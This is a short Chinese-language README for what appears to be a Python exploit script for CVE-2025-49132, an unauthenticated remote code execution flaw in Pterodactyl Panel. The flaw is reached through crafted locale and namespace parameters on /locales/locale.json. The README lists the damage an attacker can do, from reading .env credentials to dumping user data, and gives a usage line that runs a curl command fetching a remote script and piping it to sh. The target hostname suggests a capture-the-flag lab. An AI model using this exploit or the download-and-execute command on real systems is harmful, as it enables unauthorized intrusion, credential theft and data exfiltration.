
用于CVE-2025-49132的Python漏洞利用脚本,通过精心构造的locale和namespace参数实现Pterodactyl Panel上的未授权远程代码执行。
影响
通过使用带有 locale 和 namespace 查询参数的 /locales/locale.json,恶意攻击者能够在无需身份验证的情况下执行任意代码。
由于能够执行任意代码,该漏洞可被以无数种方式利用。它可用于获取对面板服务器的访问权限、读取面板配置(.env 或其他)中的凭据、从数据库中提取敏感信息(例如用户详细信息[用户名、电子邮件、名和姓、哈希密码、IP 地址等])、访问面板所管理服务器的文件等。
使用方法
python exploit.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh'